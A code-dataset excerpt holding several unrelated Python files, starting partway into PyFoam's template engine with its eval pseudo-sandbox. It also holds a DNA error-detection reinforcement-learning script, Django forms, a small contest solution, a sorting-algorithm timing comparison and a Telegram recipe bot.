escapefunc)\n\n self.fileName = filename\n\n def reportString(self,expr, err):\n result=\"Cannot eval expression '%s'. 
(%s: %s)\" %(expr, err.__class__.__name__, err)\n if self.fileName:\n result+=\" in file \"+self.fileName\n return result\n\n def _eval(self, expr, data):\n \"\"\"evalfunc with error-messages\"\"\"\n try:\n return self.evalfunc(expr, data)\n except (TypeError,NameError,IndexError,KeyError,AttributeError, SyntaxError):\n err = sys.exc_info()[1] # Needed because python 2.5 does not support 'as e'\n raise TemplateRenderError(self.reportString(expr,err))\n\nclass TolerantRenderer(RendererWithFilename):\n \"\"\"Variant of the renderer that doesn't choke on problems with evaluations\"\"\"\n\n def __init__(self, evalfunc, escapefunc,filename=None):\n RendererWithFilename.__init__(self, evalfunc, escapefunc,filename=filename)\n\n def _eval(self, expr, data):\n \"\"\"evalfunc with error-messages\"\"\"\n try:\n return self.evalfunc(expr, data)\n except (TypeError,NameError,IndexError,KeyError,AttributeError, SyntaxError):\n err = sys.exc_info()[1] # Needed because python 2.5 does not support 'as e'\n warning(self.reportString(expr,err))\n return \"Template evaluation ERROR: \"+self.reportString(expr,err)\n\nexecIdString=\"this is meant to be executed:\"\nsubstituteIdString=\"substitute current values into this string:\"\n\nclass PyratempPreprocessor(object):\n \"\"\"This class preprocesses the input that is give to it in such a\n way that the old format (using $$ at the line beginnings and $\n .. $ for expressions) is reworked into something that pyratemp understands\n \"\"\"\n def __init__(self,\n dovarline=True,\n doexpr=True,\n expressionDelimiter=\"$\",\n assignmentLineStart=\"$$\",\n allowExec=False,\n assignmentDebug=None,\n specials=[]):\n \"\"\"Create the regexp once for performance reasons\n :param dovarline: look for variable lines that start with $$\n :param doexpr: substitute expressions that are between $\n :param expressionDelimiter: character/string that is used before and after an\n expression. After the expression the reverse of the string is used\n :param assignmentLineStart: character sequence that signals an assignment line\n :param assignmentDebug: Add a commented line to debug assignments. Prefix used is this parameter\n :param allowExec: allows execution of code. This is potentially unsafe\n :param specials: a list. 
If any expression starts with one of these values then\n the full expression (including delimiters) is left verbatim in the template\"\"\"\n\n self.clip=len(expressionDelimiter)\n self.specials=specials\n\n tmp=list(expressionDelimiter)\n tmp.reverse()\n\n self.expressionDelimiter=re.escape(expressionDelimiter)\n self.expressionDelimiterEnd=re.escape(\"\".join(tmp))\n self.expressionDelimiterRaw=expressionDelimiter\n self.expressionDelimiterEndRaw=\"\".join(tmp)\n\n # print self.expressionDelimiter,self.expressionDelimiterEnd\n\n self.assignmentLineStart=assignmentLineStart\n self.assignmentDebug=assignmentDebug\n\n self.expr=re.compile(\"%s[^$!\\n]+?%s\" % (self.expressionDelimiter,self.expressionDelimiterEnd))\n self.dovarline=dovarline\n self.doexpr=doexpr\n\n self.allowExec=allowExec\n\n def __call__(self,original):\n \"\"\"This does the actual work\"\"\"\n\n if len(original)==0:\n return original\n\n lines=original.split(\"\\n\")\n if lines[-1]==\"\":\n lines=lines[:-1]\n\n result=\"\"\n\n def isVarname(name):\n return re.match(\"[_A-Za-z][_A-Za-z0-9]*$\",name.strip())!=None\n\n for l in lines:\n skipLine=False\n if l[:len(self.assignmentLineStart)]==self.assignmentLineStart and self.dovarline:\n tmp=l[len(self.assignmentLineStart):].split(\"=\")\n if len(tmp)!=2 or not isVarname(tmp[0]):\n if self.allowExec:\n execString=l[len(self.assignmentLineStart):].replace(\"\\\\\",\"\\\\\\\\\").replace(\"\\\"\",\"\\\\\\\"\")\n result+='$!setvar(\"%s\", \"%s\")!$#!' % (\n \"dummyVarForExecution\",\n execIdString+execString.strip()\n )\n result+=\"\\n\"\n skipLine=True\n else:\n error(\"Each definition must be of the form: <name>=<value>\",\n \"The string\",l,\"is not. Try running the utility with the option --allow-exec-instead-of-assignment\")\n else:\n # if tmp[1].find('\"')>=0:\n # error(\"There is a \\\" in\",tmp[1],\"\\npyratemp can't cope with that'\")\n exprStr=tmp[1].replace(\"\\\\\",\"\\\\\\\\\").replace(\"\\\"\",\"\\\\\\\"\")\n result+='$!setvar(\"%s\", \"%s\")!$#!' % (tmp[0].strip(),exprStr.strip())\n result+=\"\\n\"\n if self.assignmentDebug and self.doexpr:\n l=self.assignmentDebug+\" \"+tmp[0].strip()+\" \"+self.expressionDelimiterRaw+tmp[0].strip()+self.expressionDelimiterEndRaw\n else:\n continue\n elif self.doexpr:\n nl=\"\"\n iStart=0\n for m in self.expr.finditer(l):\n inner=l[m.start()+self.clip:m.end()-self.clip]\n hasSpecial=False\n nl+=l[iStart:m.start()]\n for k in self.specials:\n if len(k)<=len(inner):\n if inner[:len(k)]==k:\n hasSpecial=True\n substVarName=\"dummyVarForSubstitution\"\n # nl+=l[m.start():m.end()]\n nl+='$!setvar(\"%s\", \"%s\")!$#!\\n' % (\n substVarName,\n substituteIdString+l[m.start():m.end()]\n )\n nl+='$!'+substVarName+'!$'\n\n if not hasSpecial:\n nl+=\"$!\"+inner+\"!$\"\n iStart=m.end()\n result+=nl+l[iStart:]+\"\\n\"\n else:\n if not skipLine:\n result+=l+\"\\n\"\n\n # remove trailing newline if the original had none\n if original[-1]!='\\n' and result[-1]=='\\n':\n result=result[:-1]\n\n return result\n\nclass TemplateFileOldFormat(object):\n \"\"\"Works on template files. 
Does calculations between $$.\n Lines that start with $$ contain definitions\"\"\"\n\n def __init__(self,name=None,content=None):\n \"\"\"Exactly one of the parameters must be specified\n :param name: name of the template file.\n :param content: Content of the template\"\"\"\n if name==None and content==None:\n error(\"Either a file name or the content of the template must be specified\")\n if name!=None and content!=None:\n error(\"Both: a file name and the content of the template were specified\")\n if content!=None:\n template=content\n else:\n template=open(name).read()\n self.buildTemplate(template)\n\n def buildTemplate(self,template):\n lines=template.split(\"\\n\")\n self.expressions={}\n self.template=\"\"\n for l in lines:\n if l[:2]!=\"$$\":\n self.template+=l+\"\\n\"\n else:\n tmp=l[2:].split(\"=\")\n if len(tmp)!=2:\n error(\"Each definition must be of the form: <name>=<value>\",\n \"The string\",l,\"is not\")\n self.expressions[tmp[0].strip()]=tmp[1]\n\n def writeToFile(self, outfile, vals, gzip=False):\n \"\"\"In the template, replaces all the strings between $$\n with the evaluation of the expressions and writes the results to a file\n :param outfile: the resulting output file\n :param vals: dictionary with the values\n :param gzip: Zip the file (and add a .gz to the name)\"\"\"\n\n from os import path\n\n output = self.getString(vals)\n\n if path.splitext(outfile) == \".gz\":\n gzip = True\n elif path.exists(outfile + \".gz\"):\n outfile += \".gz\"\n gzip = True\n elif gzip:\n outfile += \".gz\"\n\n if gzip:\n import gzip as gz\n if PY3:\n output = output.encode()\n gz.open(outfile, \"wb\").write(output)\n unzipped=path.splitext(outfile)[0]\n if path.exists(unzipped):\n warning(\"Removing\",unzipped,\"because it might shadow generated\",\n outfile)\n from os import unlink\n unlink(unzipped)\n else:\n open(outfile, \"w\").write(output)\n\n return outfile\n\n def getString(self,vals):\n \"\"\"In the template, replaces all the strings between $$\n with the evaluation of the expressions\n :param vals: dictionary with the values\n :returns: The string with the replaced expressions\"\"\"\n\n symbols=vals.copy()\n\n exp=re.compile(\"\\$[^$\\n]*\\$\")\n\n for n,e in iteritems(self.expressions):\n if n in vals:\n error(\"Key\",n,\"already existing in\",vals)\n symbols[n]=\"(\"+str(e)+\")\"\n\n keys=list(symbols.keys())\n\n keys.sort(key=len,reverse=True)\n\n input=self.template[:]\n m=exp.search(input)\n while m:\n a,e=m.span()\n pre=input[0:a]\n post=input[e:]\n mid=input[a+1:e-1]\n\n old=\"\"\n while old!=mid:\n old=mid\n for k in keys:\n if mid.find(k)>=0:\n mid=mid.replace(k,str(symbols[k]))\n break\n\n try:\n input=pre+str(eval(mid))+post\n except ArithmeticError:\n e = sys.exc_info()[1] # Needed because python 2.5 does not support 'as e'\n print_(\"Problem evaluating\",mid)\n raise e\n\n m=exp.search(input)\n\n return input\n\nclass EvalPseudoSandboxWithMath(EvalPseudoSandbox):\n \"\"\"Add mathematical functions to the valid functons\"\"\"\n def __init__(self,allowExec=False):\n EvalPseudoSandbox.__init__(self)\n import math\n for o in dir(math):\n if o[0]!=\"_\":\n self.register(o,getattr(math,o))\n\n from PyFoam.ThirdParty.six.moves import builtins as __builtin__\n self.register(\"set\",__builtin__.set)\n\n if allowExec:\n del self.eval_allowed_globals[\"__import__\"]\n self.register(\"__import__\",__builtins__[\"__import__\"])\n\n def compile(self, expr,mode=\"eval\"):\n \"\"\"Compile a python-eval-expression. 
Overrides the default implementation\n to allow '_[1]' as a valid name\n \"\"\"\n if expr not in self._compile_cache:\n c = compile(expr, \"\", mode)\n for i in c.co_names: #prevent breakout via new-style-classes\n if i[0] == '_':\n if i[1]!='[' or i[-1]!=']':\n raise NameError(\"Name '%s' is not allowed.\" %(i))\n self._compile_cache[expr] = c\n return self._compile_cache[expr]\n\n def eval(self, expr, locals):\n \"\"\"Eval a python-eval-expression.\n\n Sets ``self.locals_ptr`` to ``locales`` and compiles the code\n before evaluating.\n \"\"\"\n\n if expr[:len(substituteIdString)]==substituteIdString:\n goOn=True\n replacement=expr[len(substituteIdString):]\n while goOn:\n try:\n value=replacement % locals\n goOn=False\n except KeyError:\n e = sys.exc_info()[1] # Needed because python 2.5 does not support 'as e'\n kExpr=\"%(\"+e.args[0]+\")\"\n replacement=replacement.replace(kExpr,\"%\"+kExpr)\n\n return value\n # print value\n\n sav = self.locals_ptr\n self.locals_ptr = locals\n doEval=True\n\n if expr[:len(execIdString)]==execIdString:\n doEval=False\n\n if doEval:\n globals= {\"__builtins__\":self.eval_allowed_globals}\n if PY3:\n globals.update(locals)\n try:\n x = eval(self.compile(expr),globals, locals)\n except:\n e = sys.exc_info()[1] # Needed because python 2.5 does not support 'as e'\n print_(\"Problem avaluating\",expr,\":\",e)\n raise e\n else:\n # globals= {\"__builtins__\":self.eval_allowed_globals}\n globals= {\"__builtins__\":__builtins__}\n expr=expr[len(execIdString):]\n exec_(self.compile(expr,mode=\"exec\"),globals,locals)\n x = None\n self.locals_ptr = sav\n return x\n\nclass EvalPseudoSandboxWithMathWithImport(EvalPseudoSandboxWithMath):\n \"\"\"Class that allows the import of packages\"\"\"\n def __init__(self):\n EvalPseudoSandboxWithMath.__init__(self,allowExec=True)\n\nclass TemplateFile(TemplateFileOldFormat):\n \"\"\"Works on template files. Does calculations between $$.\n Lines that start with $$ contain definitions\"\"\"\n\n def __init__(self,\n name=None,\n content=None,\n encoding=\"utf-8\",\n expressionDelimiter=\"|\",\n assignmentLineStart=\"$$\",\n assignmentDebug=None,\n specials=[],\n renderer_class=None,\n tolerantRender=False,\n allowExec=False\n ):\n \"\"\"Exactly one of the parameters must be specified\n :param name: name of the template file.\n :param content: Content of the template\n :param expressionDelimiter: character/string that delimits expression strings.\n :param assignmentLineStart: Start of a line that holds an assignment operation\n :param assignmentDebug: Add a commented line to debug assignments. Prefix used is this parameter\n :param allowExec: allow execution (and import). 
This is potentially unsafe\n :param special: list with strings that leave expression untreated\"\"\"\n\n self.expressionDelimiter=expressionDelimiter\n self.assignmentLineStart=assignmentLineStart\n self.assignmentDebug=assignmentDebug\n self.specials=specials\n self.allowExec=allowExec\n\n super(TemplateFile,self).__init__(name=name,\n content=content,\n )\n\n if renderer_class==None:\n if tolerantRender:\n class ConcreteTolerantRenderer(TolerantRenderer):\n def __init__(self,evalfunc, escapefunc):\n TolerantRenderer.__init__(self,\n evalfunc,\n escapefunc,filename=name)\n\n renderer_class=ConcreteTolerantRenderer\n else:\n class ConcreteRenderWithFileName(RendererWithFilename):\n def __init__(self,evalfunc, escapefunc):\n RendererWithFilename.__init__(self,\n evalfunc,\n escapefunc,filename=name)\n\n renderer_class=ConcreteRenderWithFileName\n\n if allowExec:\n sandbox=EvalPseudoSandboxWithMathWithImport\n else:\n sandbox=EvalPseudoSandboxWithMath\n\n self.ptemplate=PyratempTemplate(string=self.template,\n eval_class=sandbox,\n renderer_class=renderer_class,\n encoding=encoding,\n escape=None\n )\n\n def buildTemplate(self,template):\n self.template=PyratempPreprocessor(assignmentLineStart=self.assignmentLineStart,\n expressionDelimiter=self.expressionDelimiter,\n assignmentDebug=self.assignmentDebug,\n specials=self.specials,\n allowExec=self.allowExec\n )(template)\n\n def getString(self,vals):\n \"\"\"In the template, replaces all the strings between $$\n with the evaluation of the expressions\n :param vals: dictionary with the values\n :returns: The string with the replaced expressions\"\"\"\n\n return self.ptemplate(**vals)\n\n# Should work with Python3 and Python2\n","repo_name":"nextfoam/baram","sub_path":"PyFoam/Basics/TemplateFile.py","file_name":"TemplateFile.py","file_ext":"py","file_size_in_byte":17875,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"72"} +{"seq_id":"2509761059","text":"\nfrom gym_envs.dna_error_detection_env import DNA_Error_Detection_Env\nfrom gym_envs.nucleotide_wise_processing.single_run_with_multiple_actions.dna_error_detection_with_dnabert_masking_env import DNA_Error_Detection_With_Masking_Correction_Env\nfrom gym_envs.nucleotide_wise_processing.single_run_with_multiple_actions.dna_error_detection_single_run_env import DNA_Error_Detection_Single_Run_Env\nfrom gym_envs.nucleotide_wise_processing.single_action_with_multiple_runs.dna_error_detection_single_action_per_run import DNA_Error_Detection_Single_Action_Per_Run_Env\n\nfrom gym_envs.nucleotide_wise_processing.single_run_with_multiple_actions.dna_error_correction_single_run_env import DNA_Error_Correction_Single_Run_Env\nfrom gym_envs.sequential_processing.dna_error_detection_sequential_env import DNA_Error_Detection_Sequential_Env\n\nfrom stable_baselines3 import A2C, DQN\n#from stable_baselines3\nfrom sb3_contrib import RecurrentPPO\n\nfrom utilities.plot_manager import PlotManager\n\nBASE_PATH = \"/Users/I570101/Documents/Bachelor-Thesis/DNA_RL/\"\n\nLEARNING_RATE = 0.0001\n\nBERT_ENCODE_MODEL = \"BERT\"\nBERT_LANG_MODEL = \"BERT_LM\"\nBERT_MODEL = BERT_ENCODE_MODEL\n\nENV = None\nERROR_RATE = 0.1\nSAMPLE_SIZE = 100\nMODEL = RecurrentPPO\nLSTM_MULTI_POLICY = \"MultiInputLstmPolicy\"\nLSTM_POLICY = \"MlpLstmPolicy\"\nSB3_POLICY = LSTM_POLICY\n\nif MODEL == A2C:\n SB3_POLICY = \"MlpPolicy\"\n\n\nKMER_SHIFT = 0 # -1 = First base of triplet / 0 = middle base of triplet / 1 = last base of triplet\n\nMODE = 1\n\nif MODE == 1: # detect multiple errors in a 
single iteration\n ENV = DNA_Error_Detection_Single_Run_Env\n MODEL_NAME = \"DNA_detection_single_run\"\nelif MODE == 2: # detect one error per iteration for multiple runs\n ENV = DNA_Error_Detection_Single_Action_Per_Run_Env\n MODEL_NAME = \"DNA_detection_multi_run\"\nelif MODE == 3:\n ENV = DNA_Error_Correction_Single_Run_Env\n MODEL_NAME = \"DNA_correction_single_run\"\nelif MODE == 4:\n ENV = DNA_Error_Detection_Sequential_Env\n MODEL_NAME = \"DNA_detection_sequentially\"\nelif MODE == 5: \n ENV = DNA_Error_Detection_With_Masking_Correction_Env\n MODEL_NAME = \"DNA_masking_correction\"\n\n\nMODEL_NAME += \"_\" + str(KMER_SHIFT)# +\"_0.000001\"\n\nMODEL_PATH = BASE_PATH + \"model_data/\" + BERT_MODEL + '/' + MODEL.__name__ + '/ErrorRate' + str(ERROR_RATE)\nMODEL_PATH += '/' + MODEL_NAME \n\nDNA_PATH = BASE_PATH + \"seq1.txt\"\n\nprint(MODEL_PATH)\n\n\ndef train(model, env, no_of_steps, make_plot = True):\n if make_plot:\n plot_man = PlotManager()\n plot_man.load_historical_plot_data(MODEL_PATH + \"_hist.npy\")\n env.set_plot_data(\n (plot_man.errors_corrected_history or [0])[-1], \n (plot_man.errors_found_history or [0])[-1], \n (plot_man.errors_missed_history or [0])[-1], \n (plot_man.errors_made_history or [0])[-1], \n (plot_man.corrects_found_history or [0])[-1]\n )\n\n for counter in range(0,no_of_steps):\n model.learning_starts = 100\n model.learn(total_timesteps=1000)\n model.save(MODEL_PATH)\n \n if make_plot:\n plot_man.append_plot_data(env.get_plot_data())\n plot_man.save_historical_plot_data(MODEL_PATH + \"_hist.npy\")\n plot_man.create_plot_and_save(MODEL_PATH + \"_fig1\")\n\ndef predict(model, env):\n\n obs = env.reset()\n\n while True:\n action, _states = model.predict(obs)\n obs, rewards, dones, info = env.step(action)\n\n if (dones):\n break\n \ndef main():\n seq = open(DNA_PATH, \"r\").read().replace('\\n', '').upper()\n use_lm = True\n if BERT_MODEL == \"BERT\": use_lm = False\n env = ENV(error_rate=ERROR_RATE, use_bert_for_masked_lm=use_lm, kmer_shift=KMER_SHIFT, seq_len=SAMPLE_SIZE)\n lr = LEARNING_RATE\n\n model = MODEL(SB3_POLICY, env, verbose=1,learning_rate = lr, device='cuda')\n # n_steps = 2048,\n # batch_size = 2048,\n # n_epochs=1,\n # use_sde=True\n \n try:\n custom_objects = { 'learning_rate': lr}\n model = MODEL.load(MODEL_PATH, env, custom_objects=custom_objects)\n except Exception as e: print(e)\n\n train(model, env, 10000)\n\n predict(model, env)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"fabianxvogt/Bachelor-Thesis","sub_path":"DNA_RL/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14553536841","text":"from django import forms\nfrom django.forms import ModelForm, TextInput\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.core.mail import send_mail\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserChangeForm\n\nfrom .models import Profile, Review, Inquiry\n\nclass ProfileForm(ModelForm):\n\tclass Meta:\n\t\tmodel = Profile\n\t\tfields = ('avatar', 'description','city')\n\n\t\tlabels = {\n 'description': 'Opis',\n 'city': 'Miasto',\n }\n\nclass ReviewForm(ModelForm):\n\tclass Meta:\n\t\tmodel = Review\n\t\tfields = ('name', 'email', 'company', 'position', 'message')\n\n\t\tlabels = {\n\t\t\t'name': 'Imię i Nazwisko',\n\t\t\t'email': 'E-Mail',\n\t\t\t'company': 'Firma',\n\t\t\t'position': 'Rola w 
firmie',\n\t\t\t'message': 'Opinia',\n\t\t}\n\nclass InquiryForm(ModelForm):\n\tclass Meta:\n\t\tmodel = Inquiry\n\t\tfields = ('name', 'email', 'tel', 'message')\n\n\t\tlabels = {\n\t\t\t'name': 'Imię i Nazwisko',\n\t\t\t'email': 'E-Mail',\n\t\t\t'tel': 'Telefon',\n\t\t\t'message': 'Wiadomość',\n\t\t}\n\n\nclass AccountForm(UserChangeForm):\n\tclass Meta:\n\t\tmodel = User\n\t\tfields = ('first_name','last_name', 'password')\n\n\t\twidgets = {\n            'first_name': TextInput(attrs={'placeholder': 'Imię'}),\n        }\n\n\nclass MessageForm(forms.Form):\n\tuser = User.objects.all()\n\n\tclient = forms.CharField(\n\t\tlabel=_(\"Twoje imię i nazwisko\"),\n\t\twidget=forms.TextInput,\n\t\trequired=True,\n\t)\n\temail = forms.EmailField(\n\t\tlabel=_(\"Email kontaktowy\"),\n\t\t\n\t\trequired=True,\n\t)\n\ttel = forms.CharField(\n\t\tlabel=_(\"Telefon\"),\n\t\twidget=forms.TextInput,\n\t\trequired=False,\n\t)\n\trecipient = forms.ModelChoiceField(\n\t\tlabel=_(\"Wybierz doradcę nieruchomości\"),\n\t\tqueryset=Profile.objects.filter(city__gt='', description__gt=''),\n\t\trequired=False,\n\t)\n\tmessage = forms.CharField(\n\t\tlabel=_(\"Wiadomość\"),\n\t\twidget=forms.Textarea,\n\t\trequired=True,\n\t)\n\n\tdef __init__(self, request, *args, **kwargs):\n\t\tsuper(MessageForm, self).__init__(*args, **kwargs)\n\t\tself.request = request\n\t\tself.fields[\"recipient\"].queryset = \\\n\t\t\tself.fields[\"recipient\"].queryset.\\\n\t\t\texclude(pk=request.user.pk)\n\n\tdef save(self):\n\t\tcleaned_data = self.cleaned_data\n\t\tsend_mail(\n\t\t\t# use the lazy translation alias imported above; plain ugettext is not imported in this module\n\t\t\tsubject=_(\"A message from %s\") % \\\n\t\t\t\t'ZnajdźMiDom',\n\t\t\tmessage=cleaned_data[\"message\"],\n\t\t\tfrom_email='biuro@idealnyposrednik.pl',\n\t\t\trecipient_list=[\n\t\t\t\t'biuro@idealnyposrednik.pl',\n\t\t\t],\n\t\t\tfail_silently=True,\n\t\t)","repo_name":"dabrodev/django-prodir-pl","sub_path":"profiles/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23081164834","text":"from collections import Counter\nN = int(input())\nC = Counter()\nfor i in range(N):\n    C[input()] += 1\nn = C.most_common(1)[0][1]\nc = [k for k, v in C.items() if v == n]\nc.sort()\nfor _c in c:\n    print(_c)\n","repo_name":"e5pe0n/algorithm-training","sub_path":"AtCoder/ACP/BootCamp4b/Easy100/python/C_Poll.py","file_name":"C_Poll.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38285725585","text":"import random, time\n\nnum = []\nnum2 = []\nnum3 = []\n\nfor i in range(100):\n    num.append(random.randint(1, 1000))\n\nfor i in range(1000):\n    num2.append(random.randint(1, 10000))\n\nfor i in range(10000):\n    num3.append(random.randint(1, 100000))\n\n# num.sort()\n# num2.sort()\n# num3.sort()\n\n\nnum.sort()\nnum.reverse()\nnum2.sort()\nnum2.reverse()\nnum3 = sorted(num3, reverse=True)\n\n\ndef partition(lis, pivot):\n    less = []\n    equal = []\n    greater = []\n\n    for i in lis:\n        if i < pivot:\n            less.append(i)\n        elif i == pivot:\n            equal.append(i)\n        else:\n            greater.append(i)\n\n    return less, equal, greater\n\n\ndef quicksort(lis):\n    if len(lis) == 0:\n        return lis\n\n    pivot = random.randint(0, len(lis) - 1)\n\n    x = partition(lis, lis[pivot])\n\n    return quicksort(x[0]) + x[1] + quicksort(x[2])\n\n\ndef quicksortnonrandom(lis, pivot):\n    if len(lis) == 0:\n        return lis\n\n    x = partition(lis, lis[pivot])\n\n    # note: only the top-level pivot is fixed here; the recursive calls fall back to the random-pivot quicksort\n    return quicksort(x[0]) + x[1] + quicksort(x[2])\n\n\ndef 
merge(a, b):\n    # merge two ascending lists by repeatedly taking the smaller head element;\n    # index stays 0 because the chosen element is popped each iteration\n    merged = []\n    index = 0\n    while len(a) != 0 and len(b) != 0:\n        if a[index] <= b[index]:\n            merged.append(a[index])\n            a.pop(index)\n        elif a[index] >= b[index]:\n            merged.append(b[index])\n            b.pop(index)\n\n    merged = merged + b\n    merged = merged + a\n\n    return merged\n\n\ndef mergesort(lis):\n    # split in half, sort each half recursively, then merge the sorted halves\n    mid = len(lis) // 2\n    if len(lis) == 1:\n        return lis\n\n    return merge(mergesort(lis[mid:]), mergesort(lis[:mid]))\n\n\nprint(\"SORTING TIMING TEST WITH 100 ITEMS\\n\")\nstart = time.time()\nmergesort(num)\nend = time.time()\nprint(\"Mergesort: \" + str(end - start) + \" seconds\")\nstart = time.time()\nquicksort(num)\nend = time.time()\nprint(\"Quicksort: \" + str(end - start) + \" seconds\")\nstart = time.time()\nquicksortnonrandom(num, 0)\nend = time.time()\nprint(\"Quicksort(nonrandom pivot): \" + str(end - start) + \" seconds\")\n\nprint(\"\\nSORTING TIMING TEST WITH 1000 ITEMS\\n\")\nstart = time.time()\nmergesort(num2)\nend = time.time()\nprint(\"Mergesort: \" + str(end - start) + \" seconds\")\nstart = time.time()\nquicksort(num2)\nend = time.time()\nprint(\"Quicksort: \" + str(end - start) + \" seconds\")\nstart = time.time()\nquicksortnonrandom(num2, 0)\nend = time.time()\nprint(\"Quicksort(nonrandom pivot): \" + str(end - start) + \" seconds\")\n\nprint(\"\\nSORTING TIMING TEST WITH 10000 ITEMS\\n\")\nstart = time.time()\nmergesort(num3)\nend = time.time()\nprint(\"Mergesort: \" + str(end - start) + \" seconds\")\nstart = time.time()\nquicksort(num3)\nend = time.time()\nprint(\"Quicksort: \" + str(end - start) + \" seconds\")\nstart = time.time()\nquicksortnonrandom(num3, 0)\nend = time.time()\nprint(\"Quicksort(nonrandom pivot): \" + str(end - start) + \" seconds\")","repo_name":"AuritroSaha/auritro_coding_portfolio","sub_path":"JUNI/Python Level 3/AM11/Sorting Comparison.py","file_name":"Sorting Comparison.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
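A note on the timing harness above: a single time.time() delta per run is noisy. A minimal sketch of a steadier pattern built on the standard timeit module; the list size and repeat counts are illustrative choices, not values from the original script.

import random
import timeit

data = [random.randint(1, 1000) for _ in range(1000)]
# repeat the measurement and keep the best run; sorted() copies its input,
# so the list is identical for every repetition
best = min(timeit.repeat(lambda: sorted(data), number=10, repeat=5))
print("sorted(): best of 5 x 10 runs = %.6f seconds" % best)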
{"seq_id":"24898792549","text":"from telegram.ext import Updater, CommandHandler, MessageHandler, Filters, CallbackQueryHandler\nfrom telegram import InlineKeyboardMarkup, InlineKeyboardButton\nimport logging\nimport os\nimport numpy as np\nfrom recipe_manager import RecipeManager\n\n\n# Enable logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n                    level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\nTOKEN = os.environ.get('TELEGRAM_TOKEN', None)\n\ndef start(bot, update):\n    \"\"\"Send a message when the command /start is issued.\"\"\"\n    update.message.reply_text(\"\"\"Hi! Holly here, your friendly culinary assistant. Send /help to see what I can do!\n    \"\"\")\n\ndef help(bot, update):\n    \"\"\"Send a message when the command /help is issued.\"\"\"\n    update.message.reply_text(\"\"\"1. Search for anything and I'll show matching recipes\\n2. Send /browse to look through all my recipes\"\"\")\n\ndef show_recipes(bot, update):\n    \"Return recipes matching message\"\n    m = RecipeManager()\n    recipes = m.lookupRecipe(update.message.text.lower())\n    for name, method in recipes:\n        update.message.reply_text(name+'\\n\\n'+method)\n    if len(recipes)==0:\n        update.message.reply_text(\"Sorry, I don't know any recipes for %s\" %\n                                  update.message.text)\n\ndef list_categories(bot, update):\n    \"List recipe categories\"\n    m = RecipeManager()\n\n    keyboard = [[InlineKeyboardButton('%s\\n'%category, callback_data=category)] for\n                category in m.listRecipeCategories()]\n    reply_markup = InlineKeyboardMarkup(keyboard)\n\n    update.message.reply_text('Choose a category:', reply_markup=reply_markup)\n\n\ndef manage_callback(bot, update):\n    cb_data = update.callback_query.data\n    m = RecipeManager()\n    if update.callback_query.message.text == 'Choose a category:':\n        \"List recipes in category\"\n        category = cb_data\n        keyboard = [InlineKeyboardButton(recipe, callback_data=recipe) for\n                    recipe in m.listRecipes(category)]\n        if len(keyboard) % 2 == 0:\n            keyboard = np.reshape(keyboard, (len(keyboard) // 2, 2)).tolist()  # integer division: reshape needs int dims; tolist() restores nested lists of buttons\n        else:\n            keyboard = [[key] for key in keyboard]\n        reply_markup = InlineKeyboardMarkup(keyboard)\n\n        bot.edit_message_text(text='Choose a recipe:',\n                              reply_markup=reply_markup,\n                              chat_id=update.callback_query.message.chat_id,\n                              message_id=update.callback_query.message.message_id)\n    elif update.callback_query.message.text == 'Choose a recipe:':\n        \"Show selected recipe\"\n        recipe = cb_data\n        name, method = m.lookupRecipe(recipe, exact_match=True)\n        bot.edit_message_text(text=name+'\\n\\n'+method,\n                              chat_id=update.callback_query.message.chat_id,\n                              message_id=update.callback_query.message.message_id)\n\ndef error(bot, update, error):\n    \"\"\"Log Errors caused by Updates.\"\"\"\n    logger.warning('Update \"%s\" caused error \"%s\"', update, error)\n\n\ndef main():\n    \"\"\"Start the bot.\"\"\"\n    # Create the EventHandler and pass it your bot's token.\n    updater = Updater(TOKEN)\n\n    # Get the dispatcher to register handlers\n    dp = updater.dispatcher\n\n    # on different commands - answer in Telegram\n    dp.add_handler(CommandHandler(\"start\", start))\n    dp.add_handler(CommandHandler(\"help\", help))\n\n    dp.add_handler(CommandHandler('browse', list_categories))\n    dp.add_handler(CallbackQueryHandler(manage_callback))\n\n    dp.add_handler(MessageHandler(Filters.text, show_recipes))\n    # log all errors\n    dp.add_error_handler(error)\n\n    # Start the Bot\n    updater.start_polling()\n\n    # Run the bot until you press Ctrl-C or the process receives SIGINT,\n    # SIGTERM or SIGABRT. This should be used most of the time, since\n    # start_polling() is non-blocking and will stop the bot gracefully.\n    updater.idle()\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"peterjrichens/recipe_manager","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
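The reshape call above routes a plain Python list through NumPy just to group buttons into rows of two. A dependency-free sketch of the same row-chunking idea; chunk_rows and the sample strings are illustrative names, not part of the bot.

def chunk_rows(items, per_row=2):
    # slice the flat list into rows of at most per_row items; an odd count
    # simply leaves the last row shorter, so no parity check is needed
    return [items[i:i + per_row] for i in range(0, len(items), per_row)]

print(chunk_rows(["soup", "salad", "stew", "pie", "bread"]))
# [['soup', 'salad'], ['stew', 'pie'], ['bread']]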
